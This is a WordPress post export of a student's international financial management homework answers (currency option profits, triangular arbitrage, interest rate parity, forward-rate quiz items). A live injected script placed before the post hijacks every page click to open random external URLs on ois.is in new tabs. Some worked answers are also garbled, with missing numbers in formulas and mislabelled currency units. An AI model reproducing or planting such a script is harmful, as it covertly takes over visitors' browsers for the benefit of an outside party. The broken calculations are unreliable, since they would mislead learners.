<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":980,"date":"2023-04-22T20:27:39","date_gmt":"2023-04-22T12:27:39","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154133\/?p=980"},"modified":"2023-04-27T11:24:01","modified_gmt":"2023-04-27T03:24:01","slug":"%e5%9c%8b%e9%9a%9b%e8%b2%a1%e5%8b%99%e7%ae%a1%e7%90%86-%e4%bd%9c%e6%a5%ad4-6","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154133\/?p=980","title":{"rendered":"\u570b\u969b\u8ca1\u52d9\u7ba1\u7406-\u4f5c\u696d\u56db\u81f3\u516d"},"content":{"rendered":"<p><strong>&lt;HW4&gt;<\/strong><\/p>\n<div id=\"primary\">\n<div id=\"content\" class=\"clearfix\">\n<article id=\"post-1018\" class=\"post-1018 post type-post status-publish format-standard hentry category-uncategorized\">\n<div class=\"entry-content clearfix\">\n<p><strong>1. Selling Currency Call Options. <\/strong>Mike Suerth sold a call option on Canadian dollars for $.01 per unit.\u00a0 The strike price was $.76, and the spot rate at the time the option was exercised was $.82.\u00a0 Assume Mike did not obtain Canadian dollars until the option was exercised.\u00a0 Also assume that there are 50,000 units in a Canadian dollar option.\u00a0 What was Mike\u2019s net profit on the call option?<\/p>\n<p>ANSWER:<\/p>\n<p>Premium received per unit \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 = $.01<\/p>\n<p>Amount per unit received from selling C$ \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= $.76<\/p>\n<p>Amount per unit paid when purchasing C$ \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= $.82<\/p>\n<p>Net profit per unit \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 = \u2013$.05<\/p>\n<p>Net Profit = 50,000 units \u00d7 (\u2013$.05) \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 = \u2013$2,500<\/p>\n<p>&nbsp;<\/p>\n<p><strong>2. Speculating with Currency Put Options. <\/strong>Alice Duever purchased a put option on British pounds for $.04 per unit.\u00a0 The strike price was $1.80 and the spot rate at the time the pound option was exercised was $1.59.\u00a0 Assume there are 31,250 units in a British pound option.\u00a0 What was Alice\u2019s net profit on the option?<\/p>\n<p>ANSWER:<\/p>\n<p>Profit per unit on exercising the option \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 = $.21<\/p>\n<p>Premium paid per unit \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= $.04<\/p>\n<p>Net profit per unit \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 = $.17<\/p>\n<p>Net profit for one option = 31,250 units \u00d7 $.17 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= $5,312.50<\/p>\n<p>&nbsp;<\/p>\n<p><strong>3. Speculating with Currency Put Options. <\/strong>Bulldog, Inc., has sold Australian dollar put options at a premium of $.01 per unit, and an exercise price of $.76 per unit.\u00a0 It has forecasted the Australian dollar\u2019s lowest level over the period of concern as shown in the following table.\u00a0 Determine the net profit (or loss) per unit to Bulldog, Inc., if each level occurs and the put options are exercised at that time.<\/p>\n<p>ANSWER:<\/p>\n<p><strong>\u00a0 Possible Value \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Net Profit (Loss) to<br \/>\n<\/strong><strong><u>\u00a0of Australian Dollar<\/u><u>Bulldog, Inc.\u00a0 if Value Occurs<br \/>\n<\/u><\/strong>$.72\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2013$.03<br \/>\n.73\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2013.02<br \/>\n.74\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2013.01<br \/>\n.75\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .00<br \/>\n.76\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .01.<\/p>\n<p><strong>4. Speculating with Currency Call Options. <\/strong>Randy Rudecki purchased a call option on British pounds for $.02 per unit.\u00a0 The strike price was $1.45 and the spot rate at the time the option was exercised was $1.46.\u00a0 Assume there are 31,250 units in a British pound option.\u00a0 What was Randy\u2019s net profit on this option?<\/p>\n<p>ANSWER:<\/p>\n<p>Profit per unit on exercising the option \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 =\u00a0$.01<\/p>\n<p>Premium paid per unit \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= $.02<\/p>\n<p>Net profit per unit \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= \u2013$.01<\/p>\n<p>Net profit per option\u00a0 = 31,250 units \u00d7 (\u2013$.01) \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0= \u2013$312.50<\/p>\n<p>&nbsp;<\/p>\n<p><strong>5. Speculating with Currency Put Options. <\/strong>Auburn Co. has purchased Canadian dollar put options for specula\u00adtive purposes.\u00a0 Each option was purchased for a premium of $.02 per unit, with an exercise price of $.86 per unit.\u00a0 Auburn Co. will purchase the Canadian dollars just before it exercises the options (if it is feasible to exercise the options).\u00a0 It plans to wait until the expiration date before deciding whether to exercise the options.\u00a0 In the following table, fill in the net profit (or loss) per unit to Auburn Co. based on the listed possible spot rates of the Canadian dollar on the expiration date.<\/p>\n<p>ANSWER:<\/p>\n<p><strong>Possible Spot Rate \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Net Profit (Loss) per Unit<br \/>\n<\/strong><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 of Canadian Dollar \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0to Auburn Corporation<br \/>\n<\/strong><strong>\u00a0 \u00a0 \u00a0 \u00a0\u00a0<u>on Expiration Date<\/u>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <u>if Spot Rate Occur<\/u><\/strong><strong><u><br \/>\n<\/u><\/strong>\u00a0$.76\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $.08<br \/>\n.79 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 .05<br \/>\n.84\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .00<br \/>\n.87\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2013.02<br \/>\n.89\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2013.02<br \/>\n.91\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u2013.02<\/p>\n<\/div>\n<\/article>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<p><strong>&lt;HW5&gt;<\/strong><\/p>\n<ol>\n<li><strong>Central Bank quotes the following for the British pound and the China CNY:<\/strong><\/li>\n<\/ol>\n<table style=\"font-weight: 400;\" width=\"633\">\n<tbody>\n<tr>\n<td width=\"312\"><\/td>\n<td width=\"151\">Quoted Bid Price<\/td>\n<td width=\"170\">Quoted Ask price<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">Value of a British Pound in NTD<\/td>\n<td width=\"151\">50.33 NTD<\/td>\n<td width=\"170\">50.66 NTD<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">Value of a China CNY in NTD<\/td>\n<td width=\"151\">4.963\u00a0NTD<\/td>\n<td width=\"170\">5.125\u00a0NTD<\/td>\n<\/tr>\n<tr>\n<td width=\"312\">Value of a\u00a0British Pound in China CNY<\/td>\n<td width=\"151\">9.7195 CNY<\/td>\n<td width=\"170\">9.75 CNY<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"font-weight: 400;\">Assume you have NTD 10,000 to conduct triangular arbitrage. What is your profit from implementing this strategy\uff1f<\/p>\n<p style=\"font-weight: 400;\">\u5148\u5c07 10,000 \u65b0\u53f0\u5e63\u63db\u6210\u7d04 1951.2195 \u4eba\u6c11\u5e63\uff0810,000 \/ 5.125\uff09\uff0c\u518d\u5c071951.2195 \u4eba\u6c11\u5e63\u63db\u6210\u7d04 200.1251 \u82f1\u938a\uff081951.2195 \/ 9.75\uff09\uff0c\u6700\u5f8c\u5c07 200.1251 \u82f1\u938a\u63db\u6210\u7d04 10,072.2963 \u65b0\u53f0\u5e63\uff08200.1251 x 50.33\uff09\uff0c\u6545\u7372\u5229 10,072.2963 \u2013 10,000 = 72.2963 \u65b0\u53f0\u5e63\u3002<\/p>\n<p style=\"font-weight: 400;\"><strong>2.\u8acb\u554f\u4ee5\u4e0b\u7684\u5831\u50f9\u662f\u5426\u6709\u5957\u5229\u7a7a\u9593\uff1f\u5982\u679c\u6709\uff0c\u5982\u4f55\u64cd\u4f5c\uff1f<\/strong><\/p>\n<p style=\"font-weight: 400;\"><strong>Euro\/USD=1.2<\/strong><br \/>\n<strong>Euro\/Pound=0.8<\/strong><br \/>\n<strong>Pound\/USD=1.4<\/strong><\/p>\n<p style=\"font-weight: 400;\">\u6709\uff0c\u4ee5\u4e00\u958b\u59cb\u6301\u6709\u7f8e\u5143\u70ba\u4f8b\uff0c\u5c07 1 \u7f8e\u5143\u63db\u6210 1.2 \u6b50\u5143\uff081 x 1.2\uff09\uff0c\u518d\u5c071.2 \u6b50\u5143\u63db\u6210 1.5 \u82f1\u938a\uff081.2 x \uff09\uff0c\u6700\u5f8c\u5c071.5 \u82f1\u938a\u63db\u6210\u7d04 1.0714 \u82f1\u938a\uff081.5 x \uff09\uff0c\u6545\u7372\u5229 1.0714 \u2013 1 = 0.0714 \u7f8e\u5143<\/p>\n<p>3.<\/p>\n<p><strong>\u8a66\u6839\u64da\u4e0b\u5217\u6578\u64da\u56de\u7b54\u4ee5\u4e0b\u554f\u984c: \u5373\u671f\u532f\u7387 30.0 NT\/US<\/strong><\/p>\n<p style=\"font-weight: 400;\"><strong>\u9060\u671f\u532f\u7387 30.5 NT\/US(90 \u5929\u671f\u9060\u671f\u5916\u532f) \u9810\u671f\u532f\u7387 30.3 NT\/US(90 \u5929\u671f) \u53f0\u7063\u5229\u7387 5%<\/strong><\/p>\n<p style=\"font-weight: 400;\"><strong>\u7f8e\u570b\u5229\u7387 3%<\/strong><br \/>\n<strong>(1) \u6b64\u4f8b\u4e2d\u6709\u62cb\u88dc\u7684\u5229\u7387\u5e73\u50f9\u8aaa\u662f\u5426\u6210\u7acb\uff1f<\/strong><\/p>\n<p style=\"font-weight: 400;\">5% &#8211; 3% \u2260 \u00a0x \u00a0x 100% = 6.67%<\/p>\n<p style=\"font-weight: 400;\">\u516c\u5f0f\u5de6\u908a\u4e8c\u570b\u5229\u7387\u5dee\u8ddd\u70ba 2%\uff0c\u8207\u53f3\u908a\u9060\u671f\u8207\u5373\u671f\u532f\u7387\u5dee\u8ddd\u767e\u5206\u6bd4 6.67% \u5dee\u8ddd\u660e\u986f\uff0c\u6240\u4ee5\uff0c\u6709\u62cb\u88dc\u7684\u5229\u7387\u5e73\u50f9\u8aaa\u4e0d\u80fd\u6210\u7acb\u3002<\/p>\n<p style=\"font-weight: 400;\"><strong>(2) \u4f9d\u64da\u672a\u62cb\u88dc\u7684\u5229\u7387\u5e73\u50f9\u7406\u8ad6\uff0c\u4f60\u61c9\u8a72\u9078\u64c7\u65b0\u53f0\u5e63\u5b58\u6b3e\u6216\u7f8e\u5143\u5b58\u6b3e\uff1f<\/strong><\/p>\n<p style=\"font-weight: 400;\">\u4f9d\u64da\u672a\u62cb\u88dc\u7684\u5229\u7387\u5e73\u50f9\u8aaa\uff1a<\/p>\n<p style=\"font-weight: 400;\">\u6bd4\u8f03 i<sub>d<\/sub> \u8207 (i<sub>f<\/sub> + E) \u7684\u5927\u5c0f<br \/>\n\uf0e0 5% \u6bd4\u8f03 3% + [(E<sup>e<\/sup> \u2013 E) \/ E] x<\/p>\n<p style=\"font-weight: 400;\">\uf0e0 5% &lt; 3% + \u00a0x \u00a0= 7.0%<\/p>\n<p style=\"font-weight: 400;\">\u8868\u793a\u53f0\u7063\u7684\u6295\u8cc7\u5831\u916c\u7387\u4f4e\u65bc\u7f8e\u570b\uff0c\u6545\u6295\u8cc7\u4eba\u61c9\u9078\u64c7\u7f8e\u5143\u5b58\u6b3e\u3002<\/p>\n<p>&nbsp;<\/p>\n<p><strong>&lt;HW6&gt;<\/strong><\/p>\n<p><a href=\"https:\/\/edu.secda.info\/scu8154133\/wp-content\/uploads\/2023\/04\/\u570b\u969b\u8ca1\u52d9\u7ba1\u7406-\u4f5c\u696d4-6-\u7b46\u8a18-1.pdf\">\u570b\u969b\u8ca1\u52d9\u7ba1\u7406\u7b46\u8a18<\/a><\/p>\n<p>1. \u5047\u8a2d\u7f8e\u570b\u6709\u4f4d\u9032\u53e3\u5546\u5f9e\u745e\u58eb\u8f38\u5165\u639b\u9336\uff0c\u4ea4\u8ca8\u53ca\u4ed8\u6b3e\u65e5\u662f\u5728\u8a02\u55ae\u65e5\u671f\u7684\u516d\u500b\u6708\u5f8c\uff0c\u4ed8\u6b3e\u8ca8\u5e63\u70ba\u745e\u58eb\u6cd5\u90ce\uff1b\u7f8e\u570b\u9032\u53e3\u5546\u53ef\u7528\u4e0b\u5217\u54ea\u4e00\u7a2e\u65b9\u5f0f\u6d88\u9664\u532f\u7387\u98a8\u96aa\uff1f<\/p>\n<p>(A)\u8cb7\u745e\u58eb\u6cd5\u90ce\u9060\u671f\u5408\u7d04<\/p>\n<p>(B)\u8ce3\u745e\u58eb\u6cd5\u90ce\u9060\u671f\u5408\u7d04<\/p>\n<p>(C)\u5411\u9280\u884c\u501f\u745e\u58eb\u6cd5\u90ce\uff0c\u5728\u5373\u671f\u532f\u7387\u8f49\u63db\u6210\u7f8e\u5143\u5b58\u5230\u9280\u884c<\/p>\n<p>(D)\u5728\u5373\u671f\u532f\u7387\u8cb7\u9032\u745e\u58eb\u6cd5\u90ce<\/p>\n<p>\u7b54\u6848:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>2. \u6839\u64da\u4e0b\u5217\u7684\u8cc7\u6599\uff1a<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0<u>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/u><u>\u9060\u671f\u532f\u7387<\/u><u>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/u><\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0 \u901a\u8ca8\u00a0\u00a0\u00a0\u00a0 \u5831\u50f9\u65b9\u5f0f\u00a0\u00a0 \u5373\u671f\u532f\u7387\u00a0\u00a0\u00a0\u00a0 30\u5929\u00a0\u00a0\u00a0\u00a0\u00a0 90\u5929\u00a0\u00a0\u00a0\u00a0 180\u5929<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0 \u82f1\u938a\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u7f8e\u5f0f\u00a0\u00a0\u00a0\u00a0\u00a0 1.8814\u00a0\u00a0\u00a0\u00a0\u00a0 1.8706\u00a0\u00a0\u00a0\u00a0 1.8628\u00a0\u00a0\u00a0 1.8536<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0 \u8acb\u554f\u4e00\u55ae\u4f4d\u7f8e\u5143\u5728\u5373\u671f\u5e02\u5834\uff0c\u53ef\u4ee5\u8cb7\u5230\u5e7e\u55ae\u4f4d\u7684\u82f1\u938a\uff1f<\/p>\n<p>(A)0.5315<\/p>\n<p>(B)1.8814<\/p>\n<p>(C)0.5368<\/p>\n<p>(D)1.8628<\/p>\n<p>\u7b54\u6848:(A)<\/p>\n<p>&nbsp;<\/p>\n<p>3. \u6839\u64da\u7b2c2\u984c\u7684\u8cc7\u6599\uff0c\u8acb\u554f\u5e02\u5834\u9810\u671f\u82f1\u938a\u572890\u5929\u5f8c\u6703\u5347\u503c\u9084\u662f\u8cb6\u503c\uff1f\u9810\u671f\u5347\u503c\u7387\u6216\u8cb6\u503c\u7387\u662f\u591a\u5c11\uff1f<\/p>\n<p>(A)\u6703\u5347\u503c\uff0c \u5347\u503c\u7387\u70ba0.57%<\/p>\n<p>(B)\u6703\u5347\u503c\uff0c \u5347\u503c\u7387\u70ba0.78%<\/p>\n<p>(C)\u6703\u8cb6\u503c\uff0c \u8cb6\u503c\u7387\u70ba0.99%<\/p>\n<p>(D)\u6703\u8cb6\u503c\uff0c \u8cb6\u503c\u7387\u70ba1.48%<\/p>\n<p>\u7b54\u6848:(C)<\/p>\n<p>&nbsp;<\/p>\n<p>4. \u6839\u64da\u4e0b\u5217\u7684\u8cc7\u6599\uff1a<\/p>\n<p style=\"font-weight: 400;\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <u>\u00a0\u00a0\u00a0<\/u><u>\u5373\u671f\u532f\u7387<\/u><u>\u00a0 <\/u>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<u>30<\/u><u>\u5929\u671f\u9060\u671f\u532f\u7387<\/u><\/p>\n<p style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0 \u901a\u8ca8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u5831\u50f9\u65b9\u5f0f\u00a0\u00a0\u00a0 \u8cb7\u50f9\u00a0\u00a0\u00a0\u00a0 \u8ce3\u50f9\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u8cb7\u50f9\u00a0\u00a0\u00a0\u00a0\u00a0 \u8ce3\u50f9\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 